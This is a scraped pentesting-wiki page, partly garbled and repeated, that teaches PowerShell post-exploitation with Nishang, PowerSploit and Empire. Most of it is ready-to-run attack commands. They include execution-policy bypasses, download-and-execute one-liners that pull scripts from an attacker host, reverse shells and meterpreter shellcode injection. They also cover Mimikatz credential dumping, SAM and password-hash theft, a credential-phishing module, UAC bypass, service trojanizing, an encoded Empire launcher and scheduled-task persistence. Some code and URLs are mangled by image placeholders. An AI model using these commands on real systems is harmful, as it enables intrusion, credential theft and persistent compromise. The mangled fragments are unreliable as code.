created: 2022-04-19T19:54:02 (UTC +08:00)
tags: []
source: https://pentestwiki.org/powershell-frameworks-post-exploitation/
author:

✅ PowerShell frameworks for Post-exploitation - pentestwiki.org

Excerpt

Learn how to use different powershell frameworks for post-exploitation techniques: Nishang, Powersploit, Empire, WinEnum among others

PowerShell frameworks for Post-exploitation - 图1

In this section we will review different powershell frameworks used to help us with the post-exploitation phase.

Intro to PowerShell

To check the version:

$PSVersionTable.PSVersion

$PSVersionTable.PSVersion

  1. $PSVersionTable.PSVersion
  1. Powershell v1.0: Win XP SP2, 2003 Server SP1, Vista
  2. Powershell v2.0: Win 7, Server 2008 R2
  3. Powershell v3.0: Win 8, Server 2012
  4. Powershell v4.0: Win 8.1, Server 2012 R2
  5. Powershell v5.0: Win 10

Change default colors:

$host.ui.RawUI.ForegroundColor = “black”

$host.ui.RawUI.BackgroundColor = “white”

$host.ui.RawUI.ForegroundColor = “black” $host.ui.RawUI.BackgroundColor = “white” clear

  1. $host.ui.RawUI.ForegroundColor = "black"
  2. $host.ui.RawUI.BackgroundColor = "white"
  3. clear

To compile a ps1 into .exe use ”PowerGUI Pro script editor”

  • List hotfixes
  1. Get-HotFix

Equivalent using wmic:

  1. wmic qfe list
  • Detect sandboxed environment

Get-wmiobject win32_bios | format-list Name,SerialNumber

Get-wmiobject win32_bios | format-list Name,SerialNumber

  1. Get-wmiobject win32_bios | format-list Name,SerialNumber
  • Handling Certificates

To see installed user certificates

Get-ChildItem -Path “Cert:\CurrentUser\My”

Get-ChildItem -Path “Cert:\LocalMachine”

Get-ChildItem -Path “Cert:\CurrentUser\My” Get-ChildItem -Path “Cert:\LocalMachine”

  1. Get-ChildItem -Path "Cert:\CurrentUser\My"
  2. Get-ChildItem -Path "Cert:\LocalMachine"

Using GUI:

  1. certmgr.msc

To create a self-signed certificate:

$cert = New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname testcert.example.org

$cert = New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname testcert.example.org

  1. $cert = New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname testcert.example.org
  • Show system uptime:

Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime

Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime

  1. Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime

Some examples of PowerShell Scripts

Capturing a screenshot

[Parameter(Mandatory = PowerShell frameworks for Post-exploitation - 图2%5C%5D%5C%5Bstring%5C%5D#card=math&code=true%29%5C%5D%5C%5Bstring%5C%5D&id=XJFA4)Path

PowerShell frameworks for Post-exploitation - 图3env:COMPUTERNAME - $(get-date -f yyyy-MM-dd_HHmmss).bmp”

PowerShell frameworks for Post-exploitation - 图4Path\$FileName”

Add-Type -AssemblyName System.Windows.Forms

Add-type -AssemblyName System.Drawing

$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen

$bitmap = New-Object System.Drawing.Bitmap $Width, $Height

PowerShell frameworks for Post-exploitation - 图5bitmap)

PowerShell frameworks for Post-exploitation - 图6Left, $Top, 0, 0, $bitmap.Size)

Write-Output “Screenshot saved to:”

Param( [Parameter(Mandatory = PowerShell frameworks for Post-exploitation - 图7%5C%5D%5C%5Bstring%5C%5D#card=math&code=true%29%5C%5D%5C%5Bstring%5C%5D&id=wXiz8)Path ) PowerShell frameworks for Post-exploitation - 图8env:COMPUTERNAME - $(get-date -f yyyy-MM-dd_HHmmss).bmp” PowerShell frameworks for Post-exploitation - 图9Path\$FileName” Add-Type -AssemblyName System.Windows.Forms Add-type -AssemblyName System.Drawing $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen $Width = $Screen.Width $Height = $Screen.Height $Left = $Screen.Left $Top = $Screen.Top $bitmap = New-Object System.Drawing.Bitmap $Width, $Height PowerShell frameworks for Post-exploitation - 图10bitmap) PowerShell frameworks for Post-exploitation - 图11Left, $Top, 0, 0, $bitmap.Size) PowerShell frameworks for Post-exploitation - 图12File) Write-Output “Screenshot saved to:” Write-Output $File

  1. Param(
  2. [Parameter(Mandatory = $true)][string]$Path
  3. )
  4. $FileName = "$env:COMPUTERNAME - $(get-date -f yyyy-MM-dd_HHmmss).bmp"
  5. $File = "$Path\$FileName"
  6. Add-Type -AssemblyName System.Windows.Forms
  7. Add-type -AssemblyName System.Drawing
  8. $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
  9. $Width = $Screen.Width
  10. $Height = $Screen.Height
  11. $Left = $Screen.Left
  12. $Top = $Screen.Top
  13. $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
  14. $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
  15. $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
  16. $bitmap.Save($File) 
  17. Write-Output "Screenshot saved to:"
  18. Write-Output $File

Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/

Nishang Framework

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

in kali: /usr/share/nishang

powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”

powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”

  1. powershell.exe exec bypass Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }"

powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”

powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”

  1. powershell.exe exec bypass Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"

powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”

powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”

  1. powershell.exe exec bypass Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"

powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Get-PassHashes.ps1’; Get-PassHashes}”

powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Get-PassHashes.ps1’; Get-PassHashes}”

  1. powershell.exe exec bypass Command "& {Import-Module 'C:\Users\User\Desktop\temp\Get-PassHashes.ps1'; Get-PassHashes}"

Fileless execution with nishang:

powershell.exe -exec bypass -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://$IP/Check-VM.ps1‘); Check-VM”

powershell.exe -exec bypass -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://$IP/Check-VM.ps1‘); Check-VM”

  1. powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/Check-VM.ps1'); Check-VM"

Dont work in Windows 7:

powershell.exe -exec bypass -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://$IP/winpost/Invoke-PowerShellTcp.ps1‘); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443”

powershell.exe -exec bypass -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://$IP/winpost/Invoke-PowerShellTcp.ps1‘); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443”

  1. powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

In Windows 7:

powershell -ep bypass -command “(New-Object Net.WebClient).DownloadFile(‘http://$IP/winpost/Invoke-PowerShellTcp.ps1‘, ‘Invoke-PowerShellTcp.ps1’); Import-Module .\Invoke-PowershellTcp.ps1; Invoke-PowershellTcp -IPAddress $LOCALIP -Reverse -Port 443”

powershell -ep bypass -command “(New-Object Net.WebClient).DownloadFile(‘http://$IP/winpost/Invoke-PowerShellTcp.ps1‘, ‘Invoke-PowerShellTcp.ps1’); Import-Module .\Invoke-PowershellTcp.ps1; Invoke-PowershellTcp -IPAddress $LOCALIP -Reverse -Port 443”

  1. powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', 'Invoke-PowerShellTcp.ps1'); Import-Module .\Invoke-PowershellTcp.ps1; Invoke-PowershellTcp -IPAddress $LOCALIP -Reverse -Port 443"

Other useful modules:

  • Powerpreter
  • Out-CHM
  • Out-Word
  • Out-Excel
  • Out-HTA

Powersploit Framework

powershell.exe -exec bypass -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://:8000$IP/CodeExecution/Invoke-Shellcode.ps1‘);\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force”

powershell.exe -exec bypass -Command “IEX (New-Object Net.WebClient).DownloadString(‘http://:8000$IP/CodeExecution/Invoke-Shellcode.ps1‘);\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force”

  1. powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1');\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"

IEX (New-Object Net.WebClient).DownloadString(“http://:8000$IP/Recon/Invoke-ReverseDnsLookup.ps1“);\ Invoke-ReverseDnsLookup -IpRange $IP/24

IEX (New-Object Net.WebClient).DownloadString(“http://:8000$IP/Recon/Invoke-ReverseDnsLookup.ps1“);\ Invoke-ReverseDnsLookup -IpRange $IP/24

  1. IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1");\ Invoke-ReverseDnsLookup -IpRange $IP/24

IEX (New-Object Net.WebClient).DownloadString(“http://:8000$IP/Exfiltration/Invoke-Mimikatz.ps1“);\ Invoke-Mimikatz -DumpCreds

IEX (New-Object Net.WebClient).DownloadString(“http://:8000$IP/Exfiltration/Invoke-Mimikatz.ps1“);\ Invoke-Mimikatz -DumpCreds

  1. IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1");\ Invoke-Mimikatz -DumpCreds

IEX (New-Object Net.WebClient).DownloadString(“http://:8000$IP/Exfiltration/Invoke-NinjaCopy.ps1“);\ Invoke-NinjaCopy -Path “C:\Windows\System32\config\SAM” -LocalDestination “C:\Users\master\Desktop\SAM”

IEX (New-Object Net.WebClient).DownloadString(“http://:8000$IP/Exfiltration/Invoke-NinjaCopy.ps1“);\ Invoke-NinjaCopy -Path “C:\Windows\System32\config\SAM” -LocalDestination “C:\Users\master\Desktop\SAM”

  1. IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1");\ Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\Users\master\Desktop\SAM"

Powersploit modules: PowerUP

PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp’s escalation functionality in the privesc/powerup/* modules.

powershell.exe -nop -exec bypass

Import-Module .\PowerUp.ps1

Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

powershell.exe -nop -exec bypass Import-Module .\PowerUp.ps1 Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

  1. powershell.exe -nop -exec bypass
  2. Import-Module .\PowerUp.ps1
  3. Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

Powersploit modules: BypassUAC

import-module .\bypass-uac.ps1

import-module .\bypass-uac.ps1

  1. import-module .\bypass-uac.ps1

Does not work for Windows Server 2012:

Bypass-UAC -Method UacMethodSysprep

Bypass-UAC -Method UacMethodSysprep

  1. Bypass-UAC -Method UacMethodSysprep

Work for Windows Server 2012:

Bypass-UAC -Method ucmDismMethod

Bypass-UAC -Method UacMethodMMC2

Bypass-UAC -Method ucmDismMethod Bypass-UAC -Method UacMethodMMC2

  1. Bypass-UAC -Method ucmDismMethod
  2. Bypass-UAC -Method UacMethodMMC2

More info:

Powersploit modules: Trojanize DLL

See also Msfvenom Payloads Cheat Sheet.

Powersploit modules: Trojanize Windows Service

Write-ServiceBinary [-Name] [-UserName ] [-Password ] [-LocalGroup ] [-Credential ] [-Command ] [-Path ]

Write-ServiceBinary [-Name] [-UserName ] [-Password ] [-LocalGroup ] [-Credential ] [-Command ] [-Path ]

  1. Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]

Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/

Empire Framework

Empire is a PowerShell and Python post-exploitation agent

Installation:

git clone https://github.com/EmpireProject/Empire.git

git clone https://github.com/EmpireProject/Empire.git cd Empire/ ./setup/install.sh

  1. git clone https://github.com/EmpireProject/Empire.git
  2. cd Empire/
  3. ./setup/install.sh

Usage:

(Empire: listeners) > uselistener http

(Empire: listeners/http) > execute

(Empire: listeners/http) > launcher powershell

powershell -noP -sta -w 1 -enc SQBmACgAJAQB8AEkARQBYAA==

(Empire: listeners/http) >

./empire (Empire) > listeners (Empire: listeners) > uselistener http (Empire: listeners/http) > execute (Empire: listeners/http) > launcher powershell powershell -noP -sta -w 1 -enc SQBmACgAJAQB8AEkARQBYAA== (Empire: listeners/http) >

  1. ./empire
  2. (Empire) > listeners
  3. (Empire: listeners) > uselistener http
  4. (Empire: listeners/http) > execute
  5. (Empire: listeners/http) > launcher powershell
  6. powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==
  7. (Empire: listeners/http) >

Copy the generated powershell payload in the Windows target to open a session in Empire:

powershell -noP -sta -w 1 -enc SQBmACgAJAQB8AEkARQBYAA==

powershell -noP -sta -w 1 -enc SQBmACgAJAQB8AEkARQBYAA==

  1. powershell -noP -sta -w 1 -enc SQBmACgAJAQB8AEkARQBYAA==

To handle agents in Empire:

rename [old name] [new name]

agents interact $AGENTID rename [old name] [new name]

  1. agents
  2. interact $AGENTID
  3. rename [old name] [new name]

Advanced modules:

bypassuac http set Listener http run

  1. bypassuac http
  2. set Listener http
  3. run

or disk-less:

usemodule privesc/bypassuac_wscript

usemodule privesc/bypassuac_wscript

  1. usemodule privesc/bypassuac_wscript

For credentials gathering:

  1. mimikatz

Persistence:

usemodule persistence/elevated/schtasks

usemodule persistence/elevated/schtasks

  1. usemodule persistence/elevated/schtasks

References:

WinEnum

A Powershell Privilege Escalation Enumeration Script